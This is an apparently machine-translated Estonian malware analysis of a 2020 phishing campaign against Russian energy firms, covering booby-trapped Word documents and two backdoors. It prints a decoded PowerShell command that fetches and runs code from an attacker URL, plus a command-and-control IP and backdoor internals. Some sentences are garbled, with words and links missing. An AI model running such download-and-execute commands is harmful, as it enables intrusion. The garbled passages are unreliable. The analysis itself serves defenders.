Meie kogemus arvutiturbeintsidentide uurimisel näitab, et e-post on endiselt üks levinumaid kanaleid, mida ründajad algselt rünnatud võrguinfrastruktuuridesse tungivad. Üks hoolimatu tegevus kahtlase (või mitte nii kahtlase) kirjaga saab edasise nakatumise sisenemispunktiks, mistõttu küberkurjategijad kasutavad aktiivselt, kuigi vahelduva eduga, sotsiaalse manipuleerimise meetodeid.
Selles postituses tahame rääkida oma hiljutisest uurimisest rämpspostikampaania kohta, mis on suunatud paljudele Venemaa kütuse- ja energiakompleksi ettevõtetele. Kõik rünnakud järgisid sama stsenaariumit, kasutades võltsitud e-kirju, ja näis, et keegi pole nende e-kirjade tekstisisu kallal palju vaeva näinud.
Luureteenistus
Kõik sai alguse 2020. aasta aprilli lõpus, kui Doctor Web viiruseanalüütikud tuvastasid rämpspostikampaania, mille käigus häkkerid saatsid mitme Venemaa kütuse- ja energiakompleksi ettevõtete töötajatele uuendatud telefonikataloogi. Loomulikult ei olnud see lihtsalt mureavaldus, kuna kataloog polnud päris ja .docx-dokumendid laadisid kaugressurssidest alla kaks pilti.
Üks neist laaditi kasutaja arvutisse uudiste[.]zannews[.]com serverist. Tähelepanuväärne on, et domeeninimi sarnaneb Kasahstani korruptsioonivastase meediakeskuse domeeniga zannews[.]kz. Teisest küljest meenutas kasutatud domeen kohe teist 2015. aasta kampaaniat, mida tunti nime all TOPNEWS, mis kasutas ICEFOG-i tagaust ja mille nimedes olid trooja kontrolldomeenid alamstringiga "news". Huvitav oli ka see, et erinevatele adressaatidele e-kirjade saatmisel kasutati pildi allalaadimise päringutes kas erinevaid päringu parameetreid või unikaalseid pildinimesid.
Usume, et seda tehti eesmärgiga koguda teavet, et tuvastada "usaldusväärne" adressaat, kes saaks seejärel kirja õigel ajal avada. Pildi allalaadimiseks teisest serverist kasutati SMB-protokolli, mida sai teha NetNTLM-i räsi kogumiseks saadud dokumendi avanud töötajate arvutitest.
Ja siin on kiri ise koos võltskataloogiga:
Selle aasta juunis hakkasid häkkerid piltide üleslaadimiseks kasutama uut domeeninime sports[.]manhajnews[.]com. Analüüs näitas, et manhajnews[.]com alamdomeene on rämpspostis kasutatud vähemalt alates 2019. aasta septembrist. Selle kampaania üks sihtmärke oli suur Venemaa ülikool.
Samuti tulid rünnaku korraldajad juuniks välja oma kirjadele uue tekstiga: seekord sisaldas dokument infot tööstuse arengu kohta. Kirja tekst viitas selgelt, et selle autor kas ei räägi vene keelt või jättis endast teadlikult sellise mulje. Paraku osutusid tööstuse arendamise ideed, nagu ikka, vaid kaaneks – dokument laadis taas kaks pilti, samas kui server muudeti allalaadimiseks[.]inklingpaper[.]com.
Järgmine uuendus järgnes juulis. Püüdes mööda minna viirusetõrjeprogrammide poolt pahatahtlike dokumentide tuvastamisest, hakkasid ründajad kasutama parooliga krüpteeritud Microsoft Wordi dokumente. Samal ajal otsustasid ründajad kasutada klassikalist sotsiaalse inseneri tehnikat – preemiateatist.
Pöördumise tekst oli taas kirjutatud samas stiilis, mis äratas adressaadis täiendavat kahtlust. Samuti ei muutunud pildi allalaadimise server.
Pange tähele, et kõigil juhtudel kasutati kirjade saatmiseks mail[.]ru ja yandex[.]ru domeenidel registreeritud elektroonilisi postkaste.
Rünnak
2020. aasta septembri alguseks oli aeg tegutseda. Meie viirusanalüütikud registreerisid uue rünnakute laine, mille käigus ründajad saatsid taas kirju telefonikataloogi uuendamise ettekäändel. Seekordne manus sisaldas aga pahatahtlikku makrot.
Manustatud dokumendi avamisel lõi makro kaks faili:
- VBS-i skript %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, mis oli mõeldud pakkfaili käivitamiseks;
- Pakettfail ise %APPDATA%configstest.bat, mis oli hägustatud.
Selle töö olemus taandub Powershelli kesta käivitamisele teatud parameetritega. Shellile edastatud parameetrid dekodeeritakse käskudeks:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Nagu esitatud käskudest järeldub, on domeen, kust kasulik koormus alla laaditakse, jällegi varjatud uudistesaidiks. Lihtne , mille ainsaks ülesandeks on käsu- ja juhtimisserverist shellkoodi vastuvõtmine ja selle käivitamine. Suutsime tuvastada kahte tüüpi tagauksi, mida saab ohvri arvutisse installida.
BackDoor.Siggen2.3238
Esimene on BackDoor.Siggen2.3238 — meie spetsialistid polnud varem kokku puutunud ja ka teised viirusetõrjetootjad ei maininud seda programmi.
See programm on C++ keeles kirjutatud tagauks, mis töötab 32-bitistes Windowsi operatsioonisüsteemides.
BackDoor.Siggen2.3238 suudab suhelda haldusserveriga kasutades kahte protokolli: HTTP ja HTTPS. Testitud näidis kasutab HTTPS-protokolli. Päringud serverile kasutavad järgmist kasutajaagenti:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Sel juhul on kõik päringud varustatud järgmiste parameetritega:
%s;type=%s;length=%s;realdata=%send
kus iga rida %s on vastavalt asendatud järgmisega:
- nakatunud arvuti ID,
- saadetava päringu tüüp,
- andmete pikkus realandmete väljal,
- andmed.
Nakatunud süsteemi kohta teabe kogumise etapis genereerib tagauks järgmise rea:
lan=%s;cmpname=%s;username=%s;version=%s;
kus lan on nakatunud arvuti IP-aadress, cmpname on arvuti nimi, kasutajanimi on kasutajanimi, versioon on rida 0.0.4.03.
See teave koos sysinfo identifikaatoriga saadetakse POST-päringu kaudu juhtserverisse, mis asub aadressil https[:]//31.214[.]157.14/log.txt. Kui vastuseks BackDoor.Siggen2.3238 võtab vastu HEART-signaali, loetakse ühendus edukaks ja tagauks alustab serveriga suhtlemise põhitsüklit.
Tööpõhimõtete täielikum kirjeldus BackDoor.Siggen2.3238 on meie .
Tagauks.Whitebird.23
Teine programm on BackDoor.Whitebird tagaukse modifikatsioon, mis on meile juba teada Kasahstani valitsusasutuse vahejuhtumist. See versioon on kirjutatud C++ keeles ja mõeldud töötama nii 32-bitistes kui ka 64-bitistes Windowsi operatsioonisüsteemides.
Nagu enamik seda tüüpi programme, Tagauks.Whitebird.23 loodud krüpteeritud ühenduse loomiseks juhtserveriga ja nakatunud arvuti volitamata juhtimiseks. Paigaldatud tilguti abil kahjustatud süsteemi .
Meie uuritud valim oli kahe eksporditava pahatahtliku kogu:
- Google Play
- Test.
Oma töö alguses dekrüpteerib see tagaukse korpusesse ühendatud konfiguratsiooni, kasutades algoritmi, mis põhineb XOR-operatsioonil baidiga 0x99. Konfiguratsioon näeb välja selline:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Pideva töö tagamiseks muudab tagauks väljal määratud väärtust töötunnid konfiguratsioonid. Väli sisaldab 1440 baiti, mis võtavad väärtused 0 või 1 ja tähistavad päeva iga tunni iga minutit. Loob iga võrguliidese jaoks eraldi lõime, mis liidest kuulab ja otsib nakatunud arvutist puhverserveris olevaid autoriseerimispakette. Kui selline pakett tuvastatakse, lisab tagauks oma loendisse teabe puhverserveri kohta. Lisaks kontrollib WinAPI kaudu puhverserveri olemasolu InternetQueryOptionW.
Programm kontrollib hetke minutit ja tundi ning võrdleb seda väljal olevate andmetega töötunnid konfiguratsioonid. Kui päeva vastava minuti väärtus ei ole null, luuakse ühendus juhtserveriga.
Ühenduse loomine serveriga simuleerib ühenduse loomist kliendi ja serveri vahel TLS versiooni 1.0 protokolli abil. Tagaukse korpus sisaldab kahte puhvrit.
Esimene puhver sisaldab TLS 1.0 Client Hello paketti.
Teine puhver sisaldab TLS 1.0 Client Key Exchange pakette võtme pikkusega 0x100 baiti, Change Cipher Spec, Encrypted Handshake Message.
Client Hello paketi saatmisel kirjutab tagauks väljale Client Random 4 baiti hetkeajast ja 28 baiti pseudojuhuslikke andmeid, mis arvutatakse järgmiselt:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Vastuvõetud pakett saadetakse kontrollserverisse. Vastus (Server Hello pakett) kontrollib:
- vastavus TLS-protokolli versioonile 1.0;
- kliendi määratud ajatempli (juhusliku andmepaketi välja esimesed 4 baiti) vastavus serveri poolt määratud ajatemplile;
- esimese 4 baiti vaste ajatempli järel kliendi ja serveri juhuslike andmete väljal.
Määratud vastete korral valmistab tagauks ette kliendivõtmevahetuse paketi. Selleks muudab see avalikku võtit kliendivõtmevahetuse paketis, samuti krüptimise IV ja krüpteerimisandmeid krüptitud käepigistuse paketi paketis.
Seejärel võtab tagauks paketi käsu- ja juhtimisserverist, kontrollib, kas TLS-protokolli versioon on 1.0, ja võtab seejärel vastu veel 54 baiti (paketi sisu). See viib ühenduse seadistamise lõpule.
Tööpõhimõtete täielikum kirjeldus Tagauks.Whitebird.23 on meie .
Järeldus ja järeldused
Dokumentide, pahavara ja kasutatava infrastruktuuri analüüs võimaldab kindlalt väita, et rünnaku valmistas ette üks Hiina APT gruppidest. Arvestades ohvrite arvutitesse installitud tagauste funktsionaalsust eduka rünnaku korral, viib nakatumine vähemalt konfidentsiaalse teabe varguseni rünnatud organisatsioonide arvutitest.
Lisaks on väga tõenäoline stsenaarium spetsiaalsete troojalaste installimine kohalikesse erifunktsiooniga serveritesse. Need võivad olla domeenikontrollerid, meiliserverid, Interneti-lüüsid jne. Nagu näites näha oli , pakuvad sellised serverid ründajatele erinevatel põhjustel erilist huvi.
Allikas: www.habr.com